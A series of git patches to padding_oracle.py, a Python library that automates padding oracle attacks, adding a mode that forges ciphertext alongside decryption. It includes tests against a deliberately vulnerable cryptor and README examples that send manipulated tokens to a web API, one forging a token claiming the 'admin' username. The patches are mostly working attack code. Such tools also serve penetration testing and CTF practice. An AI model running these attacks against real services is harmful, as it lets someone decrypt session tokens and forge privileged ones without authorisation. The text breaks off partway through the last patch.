From 5c8581df0b193e61098fa45c17b9471b62e4e421 Mon Sep 17 00:00:00 2001 From: q3st1on Date: Fri, 27 Oct 2023 15:33:09 +0800 Subject: [PATCH 01/10] Add Hacky Encrypt mode Added a hacky encryption mode. Duplicated the wrapper and callback functions so they can be modified for encryption mode if needed. --- src/padding_oracle/legacy.py | 73 ++++++++++++++++++++++++++++++------ src/padding_oracle/solve.py | 1 - 2 files changed, 62 insertions(+), 12 deletions(-) diff --git a/src/padding_oracle/legacy.py b/src/padding_oracle/legacy.py index d118d6c..f3bcbe5 100644 --- a/src/padding_oracle/legacy.py +++ b/src/padding_oracle/legacy.py @@ -33,21 +33,21 @@ 'padding_oracle', ] - -def padding_oracle(ciphertext: Union[bytes, str], +def padding_oracle(payload: Union[bytes, str], block_size: int, oracle: OracleFunc, num_threads: int = 1, log_level: int = logging.INFO, null_byte: bytes = b' ', return_raw: bool = False, + mode: Union[bool, str] = 'encrypt', ) -> Union[bytes, List[int]]: ''' Run padding oracle attack to decrypt ciphertext given a function to check wether the ciphertext can be decrypted successfully. Args: - ciphertext (bytes|str) the ciphertext you want to decrypt + payload (bytes|str) the payload you want to encrypt/decrypt block_size (int) block size (the ciphertext length should be multiple of this) oracle (function) a function: oracle(ciphertext: bytes) -> bool @@ -58,33 +58,48 @@ def padding_oracle(ciphertext: Union[bytes, str], set (default: None) return_raw (bool) do not convert plaintext into bytes and unpad (default: False) + mode (bool|str) encrypt the payload (defaut: False/'decrypt') + Returns: - plaintext (bytes|List[int]) the decrypted plaintext + result (bytes|List[int]) the processed payload ''' # Check args if not callable(oracle): raise TypeError('the oracle function should be callable') - if not isinstance(ciphertext, (bytes, str)): - raise TypeError('ciphertext should have type bytes') + if not isinstance(payload, (bytes, str)): + raise TypeError('payload should have type bytes') if not isinstance(block_size, int): raise TypeError('block_size should have type int') - if not len(ciphertext) % block_size == 0: - raise ValueError('ciphertext length should be multiple of block size') + if not len(payload) % block_size == 0: + raise ValueError('payload length should be multiple of block size') if not 1 <= num_threads <= 1000: raise ValueError('num_threads should be in [1, 1000]') if not isinstance(null_byte, (bytes, str)): raise TypeError('expect null with type bytes or str') if not len(null_byte) == 1: raise ValueError('null byte should have length of 1') + if not isinstance(mode, (bool, str)): + raise TypeError('expect mode with type bool or str') + if isinstance(mode, str) and mode not in ('encrypt', 'decrypt'): + raise ValueError('mode must be either encrypt or decrypt') logger = get_logger() logger.setLevel(log_level) - ciphertext = to_bytes(ciphertext) + payload = to_bytes(payload) null_byte = to_bytes(null_byte) + + # encryption routine + if mode == 'encrypt' or mode: + return encrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger) + + # otherwise continue with decryption as normal + return decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger): + +def encrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger): # Wrapper to handle exceptions from the oracle function def wrapped_oracle(ciphertext: bytes): try: @@ -105,15 +120,51 @@ def plaintext_callback(plaintext: bytes): plaintext = convert_to_bytes(plaintext, null_byte) logger.info(f'plaintext: {plaintext}') - plaintext = solve(ciphertext, block_size, wrapped_oracle, num_threads, + plaintext = solve(payload, block_size, wrapped_oracle, num_threads, result_callback, plaintext_callback) if not return_raw: plaintext = convert_to_bytes(plaintext, null_byte) plaintext = remove_padding(plaintext) - return plaintext +def decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger): + # Wrapper to handle exceptions from the oracle function + def wrapped_oracle(ciphertext: bytes): + try: + return oracle(ciphertext) + except Exception as e: + logger.error(f'error in oracle with {ciphertext!r}, {e}') + logger.debug('error details: {}'.format(traceback.format_exc())) + return False + + def result_callback(result: ResultType): + if isinstance(result, Fail): + if result.is_critical: + logger.critical(result.message) + else: + logger.error(result.message) + + def plaintext_callback(plaintext: bytes): + plaintext = convert_to_bytes(plaintext, null_byte) + logger.info(f'plaintext: {plaintext}') + + def blocks(data: bytes): + return [data[i:(i+block_size)] for i in range(0, len(data), block_size)] + + def bytes_xor(byte_string_1: bytes, byte_string_2: bytes): + return bytes([_a ^ _b for _a, _b in zip(byte_string_1, byte_string_2)]) + + plaintext_blocks = blocks(payload) + ciphertext_blocks = [null_byte * block_size for i in range(len(plaintext_blocks)+1)] + + for index in range(len(plaintext_blocks)-1, -1, -1): + plaintext = solve(b'\x00' * block_size + ciphertext_blocks[index+1], block_size, wrapped_oracle, + num_threads, result_callback, plaintext_callback) + ciphertext_blocks[i] = bytes_xor(plaintext_blocks[index], plaintext) + + ciphertext = b''.join(ciphertext_blocks) + return ciphertext def get_logger(): logger = logging.getLogger('padding_oracle') diff --git a/src/padding_oracle/solve.py b/src/padding_oracle/solve.py index c87cea3..a68b5f2 100644 --- a/src/padding_oracle/solve.py +++ b/src/padding_oracle/solve.py @@ -38,7 +38,6 @@ 'remove_padding', ] - class Pass(NamedTuple): block_index: int solved: List[int] From 927e3a84cf40a65127be5a6a1568a5f6278af850 Mon Sep 17 00:00:00 2001 From: q3st1on Date: Fri, 27 Oct 2023 15:40:59 +0800 Subject: [PATCH 02/10] Added test Added a test for the encryption mode --- tests/test_padding_oracle.py | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/tests/test_padding_oracle.py b/tests/test_padding_oracle.py index 1a96a2a..cbad34e 100644 --- a/tests/test_padding_oracle.py +++ b/tests/test_padding_oracle.py @@ -1,3 +1,4 @@ +from cryptography.hazmat.primitives import padding from padding_oracle import padding_oracle from .cryptor import VulnerableCryptor @@ -14,6 +15,21 @@ def test_padding_oracle_basic(): assert decrypted == plaintext +def test_padding_oracle_encryption(): + cryptor = VulnerableCryptor() + + plaintext = b'the quick brown fox jumps over the lazy dog' + ciphertext = cryptor.encrypt(plaintext) + + padder = padding.PKCS7(128).padder() + payload = padder.update(plaintext) + padder.finalize() + + encrypted = padding_oracle(payload, cryptor.block_size, + cryptor.oracle, 4, null_byte=b'?', mode='encrypt') + print(encrypted) + + assert encrypted == ciphertext if __name__ == '__main__': test_padding_oracle_basic() + test_padding_oracle_encryption() From a24acdf9c395fbc2b9d4bce2368ec4b0b1190581 Mon Sep 17 00:00:00 2001 From: q3st1on Date: Fri, 27 Oct 2023 16:07:06 +0800 Subject: [PATCH 03/10] Bugfixes Fixed bugs in library and tests. Now seem to be working --- src/padding_oracle/legacy.py | 24 +++++++++++++----------- tests/test_padding_oracle.py | 6 +++--- 2 files changed, 16 insertions(+), 14 deletions(-) diff --git a/src/padding_oracle/legacy.py b/src/padding_oracle/legacy.py index f3bcbe5..4f775a8 100644 --- a/src/padding_oracle/legacy.py +++ b/src/padding_oracle/legacy.py @@ -40,7 +40,7 @@ def padding_oracle(payload: Union[bytes, str], log_level: int = logging.INFO, null_byte: bytes = b' ', return_raw: bool = False, - mode: Union[bool, str] = 'encrypt', + mode: Union[bool, str] = 'decrypt', ) -> Union[bytes, List[int]]: ''' Run padding oracle attack to decrypt ciphertext given a function to check @@ -92,14 +92,14 @@ def padding_oracle(payload: Union[bytes, str], null_byte = to_bytes(null_byte) - # encryption routine - if mode == 'encrypt' or mode: - return encrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger) + # Does the user want the encryption routine + if (mode == 'encrypt') or (mode == True): + return encrypt(payload, block_size, oracle, num_threads, null_byte, logger) - # otherwise continue with decryption as normal - return decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger): + # If not continue with decryption as normal + return decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger) -def encrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger): +def decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger): # Wrapper to handle exceptions from the oracle function def wrapped_oracle(ciphertext: bytes): try: @@ -126,9 +126,11 @@ def plaintext_callback(plaintext: bytes): if not return_raw: plaintext = convert_to_bytes(plaintext, null_byte) plaintext = remove_padding(plaintext) + + return plaintext -def decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger): +def encrypt(payload, block_size, oracle, num_threads, null_byte, logger): # Wrapper to handle exceptions from the oracle function def wrapped_oracle(ciphertext: bytes): try: @@ -150,18 +152,18 @@ def plaintext_callback(plaintext: bytes): logger.info(f'plaintext: {plaintext}') def blocks(data: bytes): - return [data[i:(i+block_size)] for i in range(0, len(data), block_size)] + return [data[index:(index+block_size)] for index in range(0, len(data), block_size)] def bytes_xor(byte_string_1: bytes, byte_string_2: bytes): return bytes([_a ^ _b for _a, _b in zip(byte_string_1, byte_string_2)]) plaintext_blocks = blocks(payload) - ciphertext_blocks = [null_byte * block_size for i in range(len(plaintext_blocks)+1)] + ciphertext_blocks = [null_byte * block_size for _ in range(len(plaintext_blocks)+1)] for index in range(len(plaintext_blocks)-1, -1, -1): plaintext = solve(b'\x00' * block_size + ciphertext_blocks[index+1], block_size, wrapped_oracle, num_threads, result_callback, plaintext_callback) - ciphertext_blocks[i] = bytes_xor(plaintext_blocks[index], plaintext) + ciphertext_blocks[index] = bytes_xor(plaintext_blocks[index], plaintext) ciphertext = b''.join(ciphertext_blocks) return ciphertext diff --git a/tests/test_padding_oracle.py b/tests/test_padding_oracle.py index cbad34e..abd9c11 100644 --- a/tests/test_padding_oracle.py +++ b/tests/test_padding_oracle.py @@ -23,12 +23,12 @@ def test_padding_oracle_encryption(): padder = padding.PKCS7(128).padder() payload = padder.update(plaintext) + padder.finalize() - + encrypted = padding_oracle(payload, cryptor.block_size, cryptor.oracle, 4, null_byte=b'?', mode='encrypt') - print(encrypted) + decrypted = cryptor.decrypt(encrypted) - assert encrypted == ciphertext + assert decrypted == plaintext if __name__ == '__main__': test_padding_oracle_basic() From 5fc4f437e9900178080a553d429216dba91a42e1 Mon Sep 17 00:00:00 2001 From: q3st1on Date: Fri, 27 Oct 2023 16:29:30 +0800 Subject: [PATCH 04/10] Updated README added demonstration of encryption mode to README --- README.md | 39 ++++++++++++++++++++++++++++++++++++++- 1 file changed, 38 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 176e94f..902a115 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,4 @@ + # Padding Oracle Python Automation Script ![python-package-badge](https://github.com/djosix/padding_oracle.py/actions/workflows/python-package.yml/badge.svg) @@ -30,7 +31,7 @@ Performance of padding_oracle.py was evaluated using [0x09] Cathub Party from ED | 64 | 56s | ## How to Use - +### Decryption To illustrate the usage, consider an example of testing `https://vulnerable.website/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D`: ```python @@ -63,6 +64,42 @@ plaintext = padding_oracle( num_threads = 16, ) ``` +### Encryption +To illustrate the usage, consider an example of forging a token for`https://vulnerable.website/api/?token=<.....>`: + +```python +from padding_oracle import padding_oracle, base64_encode, base64_decode +import requests + +sess = requests.Session() # use connection pool +url = 'https://vulnerable.website/api/' + +def oracle(ciphertext: bytes): + resp = sess.get(url, params={'token': base64_encode(ciphertext)}) + + if 'failed' in resp.text: + return False # e.g. token decryption failed + elif 'success' in resp.text: + return True + else: + raise RuntimeError('unexpected behavior') + +def pad(data: bytes, block_size=16): + pad_value = block_size - len(data) % block_size + return text + bytearray([pad_value for i in range(pad_value)]) + +payload: bytes =b"{'username':'admin'}" +payload = pad(payload) +assert len(payload) % 16 == 0 + +ciphertext = padding_oracle( + payload, + block_size = 16, + oracle = oracle, + num_threads = 16, + mode = 'encrypt' +) +``` In addition, the package provides PHP-like encoding/decoding functions: From ceda9120bf2e1f189233777732a854b35b4bdb09 Mon Sep 17 00:00:00 2001 From: q3st1on Date: Fri, 27 Oct 2023 16:48:38 +0800 Subject: [PATCH 05/10] fixed readme typo --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 902a115..0e0fcc4 100644 --- a/README.md +++ b/README.md @@ -85,8 +85,8 @@ def oracle(ciphertext: bytes): raise RuntimeError('unexpected behavior') def pad(data: bytes, block_size=16): - pad_value = block_size - len(data) % block_size - return text + bytearray([pad_value for i in range(pad_value)]) + pad_value = block_size - len(data) % block_size + return data + bytearray([pad_value for i in range(pad_value)]) payload: bytes =b"{'username':'admin'}" payload = pad(payload) From d5d618d2bbea93ba5c13d5faca58b4f5aa405f38 Mon Sep 17 00:00:00 2001 From: q3st1on Date: Tue, 7 Nov 2023 11:39:19 +0800 Subject: [PATCH 06/10] Updated code Fixed the printout to just update the user on progress (it does still print the final encrypted payload). Added PKCS#7 padding by default to match the default decryption behaviour. Changed mode to accept only a string. I think I have fixed the various nit suggestions but may have missed some (or many tbh) Actually remembered to push changes (wow incredible right) --- README.md | 15 +++++------- src/padding_oracle/legacy.py | 44 +++++++++++++++++++++++++----------- src/padding_oracle/solve.py | 9 ++++++++ tests/test_padding_oracle.py | 5 +--- 4 files changed, 47 insertions(+), 26 deletions(-) diff --git a/README.md b/README.md index 0e0fcc4..296fe15 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,3 @@ - # Padding Oracle Python Automation Script ![python-package-badge](https://github.com/djosix/padding_oracle.py/actions/workflows/python-package.yml/badge.svg) @@ -30,8 +29,10 @@ Performance of padding_oracle.py was evaluated using [0x09] Cathub Party from ED | 16 | 1m 20s | | 64 | 56s | -## How to Use +## How to Use + ### Decryption + To illustrate the usage, consider an example of testing `https://vulnerable.website/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D`: ```python @@ -64,8 +65,10 @@ plaintext = padding_oracle( num_threads = 16, ) ``` + ### Encryption -To illustrate the usage, consider an example of forging a token for`https://vulnerable.website/api/?token=<.....>`: + +To illustrate the usage, consider an example of forging a token for `https://vulnerable.website/api/?token=<.....>` : ```python from padding_oracle import padding_oracle, base64_encode, base64_decode @@ -84,13 +87,7 @@ def oracle(ciphertext: bytes): else: raise RuntimeError('unexpected behavior') -def pad(data: bytes, block_size=16): - pad_value = block_size - len(data) % block_size - return data + bytearray([pad_value for i in range(pad_value)]) - payload: bytes =b"{'username':'admin'}" -payload = pad(payload) -assert len(payload) % 16 == 0 ciphertext = padding_oracle( payload, diff --git a/src/padding_oracle/legacy.py b/src/padding_oracle/legacy.py index 4f775a8..ffc493b 100644 --- a/src/padding_oracle/legacy.py +++ b/src/padding_oracle/legacy.py @@ -27,7 +27,7 @@ from .encoding import to_bytes from .solve import ( solve, Fail, OracleFunc, ResultType, - convert_to_bytes, remove_padding) + convert_to_bytes, remove_padding, add_padding) __all__ = [ 'padding_oracle', @@ -41,6 +41,7 @@ def padding_oracle(payload: Union[bytes, str], null_byte: bytes = b' ', return_raw: bool = False, mode: Union[bool, str] = 'decrypt', + pad_payload: bool = True ) -> Union[bytes, List[int]]: ''' Run padding oracle attack to decrypt ciphertext given a function to check @@ -58,7 +59,9 @@ def padding_oracle(payload: Union[bytes, str], set (default: None) return_raw (bool) do not convert plaintext into bytes and unpad (default: False) - mode (bool|str) encrypt the payload (defaut: False/'decrypt') + mode (str) encrypt the payload (defaut: 'decrypt') + pad_payload (bool) PKCS#7 pad the supplied payload before + encryption (default: True) Returns: @@ -72,19 +75,18 @@ def padding_oracle(payload: Union[bytes, str], raise TypeError('payload should have type bytes') if not isinstance(block_size, int): raise TypeError('block_size should have type int') - if not len(payload) % block_size == 0: - raise ValueError('payload length should be multiple of block size') if not 1 <= num_threads <= 1000: raise ValueError('num_threads should be in [1, 1000]') if not isinstance(null_byte, (bytes, str)): raise TypeError('expect null with type bytes or str') if not len(null_byte) == 1: raise ValueError('null byte should have length of 1') - if not isinstance(mode, (bool, str)): - raise TypeError('expect mode with type bool or str') + if not isinstance(mode, str): + raise TypeError('expect mode with type str') if isinstance(mode, str) and mode not in ('encrypt', 'decrypt'): raise ValueError('mode must be either encrypt or decrypt') - + if (mode == 'decrypt') and not (len(payload) % block_size == 0): + raise ValueError('for decryption payload length should be multiple of block size') logger = get_logger() logger.setLevel(log_level) @@ -93,8 +95,8 @@ def padding_oracle(payload: Union[bytes, str], # Does the user want the encryption routine - if (mode == 'encrypt') or (mode == True): - return encrypt(payload, block_size, oracle, num_threads, null_byte, logger) + if (mode == 'encrypt'): + return encrypt(payload, block_size, oracle, num_threads, null_byte, pad_payload, logger) # If not continue with decryption as normal return decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger) @@ -126,11 +128,11 @@ def plaintext_callback(plaintext: bytes): if not return_raw: plaintext = convert_to_bytes(plaintext, null_byte) plaintext = remove_padding(plaintext) - + return plaintext -def encrypt(payload, block_size, oracle, num_threads, null_byte, logger): +def encrypt(payload, block_size, oracle, num_threads, null_byte, pad_payload, logger): # Wrapper to handle exceptions from the oracle function def wrapped_oracle(ciphertext: bytes): try: @@ -148,8 +150,11 @@ def result_callback(result: ResultType): logger.error(result.message) def plaintext_callback(plaintext: bytes): - plaintext = convert_to_bytes(plaintext, null_byte) - logger.info(f'plaintext: {plaintext}') + plaintext = convert_to_bytes(plaintext, null_byte).strip(null_byte) + bytes_done = str(len(plaintext)).rjust(len(str(block_size)), ' ') + blocks_done = solve_index.rjust(len(block_total), ' ') + printout = "{0}/{1} bytes encrypted in block {2}/{3}".format(bytes_done, block_size, blocks_done, block_total) + logger.info(printout) def blocks(data: bytes): return [data[index:(index+block_size)] for index in range(0, len(data), block_size)] @@ -157,15 +162,28 @@ def blocks(data: bytes): def bytes_xor(byte_string_1: bytes, byte_string_2: bytes): return bytes([_a ^ _b for _a, _b in zip(byte_string_1, byte_string_2)]) + if pad_payload: + payload = add_padding(payload, block_size) + + if len(payload) % block_size != 0: + raise ValueError('''For encryption payload length must be a multiple of blocksize. Perhaps you meant to + pad the payload (inbuilt PKCS#7 padding can be enabled by setting pad_payload=True)''') + plaintext_blocks = blocks(payload) ciphertext_blocks = [null_byte * block_size for _ in range(len(plaintext_blocks)+1)] + solve_index = '1' + block_total = str(len(plaintext_blocks)) + for index in range(len(plaintext_blocks)-1, -1, -1): plaintext = solve(b'\x00' * block_size + ciphertext_blocks[index+1], block_size, wrapped_oracle, num_threads, result_callback, plaintext_callback) ciphertext_blocks[index] = bytes_xor(plaintext_blocks[index], plaintext) + solve_index = str(int(solve_index)+1) ciphertext = b''.join(ciphertext_blocks) + logger.info(f"forged ciphertext: {ciphertext}") + return ciphertext def get_logger(): diff --git a/src/padding_oracle/solve.py b/src/padding_oracle/solve.py index a68b5f2..f2a8f50 100644 --- a/src/padding_oracle/solve.py +++ b/src/padding_oracle/solve.py @@ -36,6 +36,7 @@ 'solve', 'convert_to_bytes', 'remove_padding', + 'add_padding' ] class Pass(NamedTuple): @@ -264,3 +265,11 @@ def remove_padding(data: Union[str, bytes, List[int]]) -> bytes: ''' data = to_bytes(data) return data[:-data[-1]] + +def add_padding(data: Union[str, bytes, List[int]], block_size: int) -> bytes: + ''' + Add PKCS#7 padding bytes. + ''' + data = to_bytes(data) + pad_len = block_size - len(data) % block_size + return data + (bytes([pad_len]) * pad_len) \ No newline at end of file diff --git a/tests/test_padding_oracle.py b/tests/test_padding_oracle.py index abd9c11..95a8f25 100644 --- a/tests/test_padding_oracle.py +++ b/tests/test_padding_oracle.py @@ -21,10 +21,7 @@ def test_padding_oracle_encryption(): plaintext = b'the quick brown fox jumps over the lazy dog' ciphertext = cryptor.encrypt(plaintext) - padder = padding.PKCS7(128).padder() - payload = padder.update(plaintext) + padder.finalize() - - encrypted = padding_oracle(payload, cryptor.block_size, + encrypted = padding_oracle(plaintext, cryptor.block_size, cryptor.oracle, 4, null_byte=b'?', mode='encrypt') decrypted = cryptor.decrypt(encrypted) From 0a89f865c2a524b6685ab6c3f48cf71f6bed2fac Mon Sep 17 00:00:00 2001 From: q3st1on Date: Tue, 7 Nov 2023 11:55:15 +0800 Subject: [PATCH 07/10] formatting issues forgot to check formatting was ok, have fixed some issues with it. flake8 is not happy with the formatting --- src/padding_oracle/legacy.py | 10 ++++++---- src/padding_oracle/solve.py | 4 +++- 2 files changed, 9 insertions(+), 5 deletions(-) diff --git a/src/padding_oracle/legacy.py b/src/padding_oracle/legacy.py index ffc493b..3d9ef3f 100644 --- a/src/padding_oracle/legacy.py +++ b/src/padding_oracle/legacy.py @@ -33,6 +33,7 @@ 'padding_oracle', ] + def padding_oracle(payload: Union[bytes, str], block_size: int, oracle: OracleFunc, @@ -93,7 +94,6 @@ def padding_oracle(payload: Union[bytes, str], payload = to_bytes(payload) null_byte = to_bytes(null_byte) - # Does the user want the encryption routine if (mode == 'encrypt'): return encrypt(payload, block_size, oracle, num_threads, null_byte, pad_payload, logger) @@ -101,6 +101,7 @@ def padding_oracle(payload: Union[bytes, str], # If not continue with decryption as normal return decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger) + def decrypt(payload, block_size, oracle, num_threads, null_byte, return_raw, logger): # Wrapper to handle exceptions from the oracle function def wrapped_oracle(ciphertext: bytes): @@ -171,21 +172,22 @@ def bytes_xor(byte_string_1: bytes, byte_string_2: bytes): plaintext_blocks = blocks(payload) ciphertext_blocks = [null_byte * block_size for _ in range(len(plaintext_blocks)+1)] - + solve_index = '1' block_total = str(len(plaintext_blocks)) for index in range(len(plaintext_blocks)-1, -1, -1): plaintext = solve(b'\x00' * block_size + ciphertext_blocks[index+1], block_size, wrapped_oracle, - num_threads, result_callback, plaintext_callback) + num_threads, result_callback, plaintext_callback) ciphertext_blocks[index] = bytes_xor(plaintext_blocks[index], plaintext) solve_index = str(int(solve_index)+1) - + ciphertext = b''.join(ciphertext_blocks) logger.info(f"forged ciphertext: {ciphertext}") return ciphertext + def get_logger(): logger = logging.getLogger('padding_oracle') formatter = logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s') diff --git a/src/padding_oracle/solve.py b/src/padding_oracle/solve.py index f2a8f50..3cb2861 100644 --- a/src/padding_oracle/solve.py +++ b/src/padding_oracle/solve.py @@ -39,6 +39,7 @@ 'add_padding' ] + class Pass(NamedTuple): block_index: int solved: List[int] @@ -266,10 +267,11 @@ def remove_padding(data: Union[str, bytes, List[int]]) -> bytes: data = to_bytes(data) return data[:-data[-1]] + def add_padding(data: Union[str, bytes, List[int]], block_size: int) -> bytes: ''' Add PKCS#7 padding bytes. ''' data = to_bytes(data) pad_len = block_size - len(data) % block_size - return data + (bytes([pad_len]) * pad_len) \ No newline at end of file + return data + (bytes([pad_len]) * pad_len) From 84716a7c56614e93ad29c9e916da94bab755e513 Mon Sep 17 00:00:00 2001 From: djosix Date: Sat, 18 Nov 2023 08:17:25 +0800 Subject: [PATCH 08/10] refactor: support encryption --- .github/workflows/python-package.yml | 2 +- README.md | 137 ++++++----- src/padding_oracle/__init__.py | 41 ++-- src/padding_oracle/legacy.py | 197 ---------------- src/padding_oracle/logger.py | 39 ++++ src/padding_oracle/padding_oracle.py | 139 ++++++++++++ src/padding_oracle/solve.py | 227 +++++++++---------- src/padding_oracle/{encoding.py => utils.py} | 43 +++- tests/test_padding_oracle.py | 41 ++-- tests/test_solve.py | 18 +- 10 files changed, 446 insertions(+), 438 deletions(-) delete mode 100644 src/padding_oracle/legacy.py create mode 100644 src/padding_oracle/logger.py create mode 100644 src/padding_oracle/padding_oracle.py rename src/padding_oracle/{encoding.py => utils.py} (61%) diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml index e303fda..8dc4d12 100644 --- a/.github/workflows/python-package.yml +++ b/.github/workflows/python-package.yml @@ -16,7 +16,7 @@ jobs: strategy: fail-fast: false matrix: - python-version: ["3.7", "3.8", "3.9", "3.10", "3.11"] + python-version: ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12"] steps: - uses: actions/checkout@v3 diff --git a/README.md b/README.md index 296fe15..7e37d1e 100644 --- a/README.md +++ b/README.md @@ -1,116 +1,111 @@ -# Padding Oracle Python Automation Script +# Padding Oracle Automation in Python -![python-package-badge](https://github.com/djosix/padding_oracle.py/actions/workflows/python-package.yml/badge.svg) +![Python Package Badge](https://github.com/djosix/padding_oracle.py/actions/workflows/python-package.yml/badge.svg) -The padding_oracle.py is a highly efficient, threaded [padding oracle](https://en.wikipedia.org/wiki/Padding_oracle_attack) attack automation script, specifically developed for Python 3. +This script automates padding oracle attacks in Python, offering efficient and threaded execution. ## Installation -You can install the package using either PyPI or directly from GitHub: +You can install the script using one of these methods: -**Via PyPI:** -```shell -pip3 install -U padding_oracle -``` +- **Via PyPI:** + ```shell + pip3 install -U padding_oracle + ``` -**Via GitHub:** -```shell -pip3 install -U git+https://github.com/djosix/padding_oracle.py.git -``` +- **Directly from GitHub:** + ```shell + pip3 install -U git+https://github.com/djosix/padding_oracle.py.git + ``` -## Performance Metrics +## Performance -Performance of padding_oracle.py was evaluated using [0x09] Cathub Party from EDU-CTF: +The script's performance varies depending on the number of request threads. This was tested in a CTF web challenge: -| Number of Request Threads | Time Taken | -|-----------------|----------------| -| 1 | 17m 43s | -| 4 | 5m 23s | -| 16 | 1m 20s | -| 64 | 56s | +| Request Threads | Time Taken | +|-----------------|-------------| +| 1 | 17m 43s | +| 4 | 5m 23s | +| 16 | 1m 20s | +| 64 | 56s | -## How to Use +## Usage ### Decryption -To illustrate the usage, consider an example of testing `https://vulnerable.website/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D`: +When trying to decrypt a token like the one at `https://example.com/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D`, this script assumes that the token is vulnerable to a padding oracle attack. ```python -from padding_oracle import padding_oracle, base64_encode, base64_decode +from padding_oracle import decrypt, base64_encode, base64_decode import requests -sess = requests.Session() # use connection pool -url = 'https://vulnerable.website/api/' +sess = requests.Session() # Uses connection pooling +url = 'https://example.com/api/' def oracle(ciphertext: bytes): - resp = sess.get(url, params={'token': base64_encode(ciphertext)}) - - if 'failed' in resp.text: - return False # e.g. token decryption failed - elif 'success' in resp.text: + response = sess.get(url, params={'token': base64_encode(ciphertext)}) + if 'failed' in response.text: + return False # Token decryption failed + elif 'success' in response.text: return True else: - raise RuntimeError('unexpected behavior') - -ciphertext: bytes = base64_decode('M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94=') -# len(ciphertext) is 32 -# possibly be "IV + cipher block" if block size is 16 + raise RuntimeError('Unexpected behavior') +ciphertext = base64_decode('M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94=') assert len(ciphertext) % 16 == 0 -plaintext = padding_oracle( +plaintext = decrypt( ciphertext, - block_size = 16, - oracle = oracle, - num_threads = 16, + block_size=16, + oracle=oracle, + num_threads=16, ) ``` ### Encryption -To illustrate the usage, consider an example of forging a token for `https://vulnerable.website/api/?token=<.....>` : +Below is an example demonstrating how to encrypt arbitrary bytes. For a detailed understanding of the process, please refer to [this Pull Request](https://github.com/djosix/padding_oracle.py/pull/4). Keep in mind that, unlike the decryption process, this functionality cannot be parallelized. ```python -from padding_oracle import padding_oracle, base64_encode, base64_decode -import requests +from padding_oracle import encrypt -sess = requests.Session() # use connection pool -url = 'https://vulnerable.website/api/' +ciphertext = encrypt(b'YourTextHere', block_size=16, oracle=oracle) +``` -def oracle(ciphertext: bytes): - resp = sess.get(url, params={'token': base64_encode(ciphertext)}) +### Customized Logging - if 'failed' in resp.text: - return False # e.g. token decryption failed - elif 'success' in resp.text: - return True - else: - raise RuntimeError('unexpected behavior') +Both `encrypt` and `decrypt` allow user to inject a custom logger: -payload: bytes =b"{'username':'admin'}" +- **Disable Logging:** + ```python + from padding_oracle import nop_logger -ciphertext = padding_oracle( - payload, - block_size = 16, - oracle = oracle, - num_threads = 16, - mode = 'encrypt' -) -``` + plaintext = decrypt( + ... + logger=nop_logger, + ) + ``` + +- **Selective Logging:** + ```python + def logger(kind: str, message: str): + if kind in ('oracle_error', 'solve_block_error'): + print(f'[{kind}] {message}') -In addition, the package provides PHP-like encoding/decoding functions: + plaintext = decrypt( + ... + logger=logger, + ) + ``` + +### Extras + +The script also includes PHP-like encoding and decoding functions: ```python -from padding_oracle.encoding import ( - urlencode, - urldecode, - base64_encode, - base64_decode, -) +from padding_oracle.encoding import urlencode, urldecode, base64_encode, base64_decode ``` ## License -Padding Oracle Python Automation Script is distributed under the terms of the MIT license. - - +This script is distributed under the MIT license. diff --git a/src/padding_oracle/__init__.py b/src/padding_oracle/__init__.py index 4b2abb8..8caf522 100644 --- a/src/padding_oracle/__init__.py +++ b/src/padding_oracle/__init__.py @@ -20,23 +20,36 @@ SOFTWARE. ''' -from .solve import solve, convert_to_bytes, remove_padding -from .encoding import ( - urlencode, urldecode, - base64_encode, base64_decode, - to_bytes, to_str, +from .padding_oracle import ( + decrypt, + encrypt, ) -from .legacy import padding_oracle +from .utils import ( + to_bytes, + to_str, + base64_encode, + base64_decode, + urlencode, + urldecode, + remove_padding, + add_padding, +) +from .logger import Logger, default_logger, nop_logger +from .solve import solve __all__ = [ - 'solve', - 'convert_to_bytes', - 'remove_padding', - 'padding_oracle', - 'urlencode', - 'urldecode', - 'base64_encode', - 'base64_decode', + 'decrypt', + 'encrypt', 'to_bytes', 'to_str', + 'base64_encode', + 'base64_decode', + 'urlencode', + 'urldecode', + 'remove_padding', + 'add_padding', + 'solve', + 'Logger', + 'default_logger', + 'nop_logger', ] diff --git a/src/padding_oracle/legacy.py b/src/padding_oracle/legacy.py deleted file mode 100644 index 3d9ef3f..0000000 --- a/src/padding_oracle/legacy.py +++ /dev/null @@ -1,197 +0,0 @@ -''' -Copyright (c) 2022 Yuankui Li - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, 